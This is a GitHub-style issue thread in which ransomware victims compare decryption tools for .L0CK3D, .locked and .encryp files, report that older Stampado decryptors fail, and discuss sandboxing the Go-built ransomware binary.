Based on my search it seems .locked is Stampado ransomware and two tools seem to be recommended: https://success.trendmicro.com/en-US/solution/KA-0006362 and https://www.emsisoft.com/en/ransomware-decryption/stampado/

Those are old decryption tools.
I already tested them with .L0CK3D and they do not work.
The Emsisoft one is asking for an email which I can't provide since read-me3.txt doesn't contain one.

@gregbtm

gregbtm commented Nov 24, 2024

Based on my search it seems .locked is Stampado ransomware and two tools seem to be recommended: https://success.trendmicro.com/en-US/solution/KA-0006362 and https://www.emsisoft.com/en/ransomware-decryption/stampado/

Those are old decryption tools. I already tested them with .L0CK3D and they do not work. The Emsisoft one is asking for an email which I can't provide since read-me3.txt doesn't contain one.

What if they're just .locked? Kind of desperate :|

@markantony-sys

I have found the decrypted file on the server, it's built as a Go executable.
I have run the file in a sandbox, and it prints a key before starting encryption, but every time it runs it gives a new key..
Can we reverse engineer the file to know what methods it is using?

@Chocapikk

I have found the decrypted file on the server, it's built as a Go executable. I have run the file in a sandbox, and it prints a key before starting encryption, but every time it runs it gives a new key.. Can we reverse engineer the file to know what methods it is using?

Maybe you can share the file here?

@VugarAli
VugarAli commented Dec 3, 2024

Hi @v0idxyz,

Thank you for sharing the decryption tool. I’ve noticed that some users have successfully decrypted .encryp files using it.

However, I’ve followed the provided instructions and encountered an issue. While the file extensions are changed, the content remains encrypted and unreadable.

Could you please provide additional guidance or clarify if there are any prerequisites or common mistakes to avoid? Your help would be greatly appreciated.

Thank you in advance!

@Mizer-Mi
Is there any update for '.L0CK3D'? And are there any people who can solve this by paying money?

@gregbtm
gregbtm commented Dec 14, 2024

Is there any update for '.L0CK3D'? And are there any people who can solve this by paying money?

I'm after the same
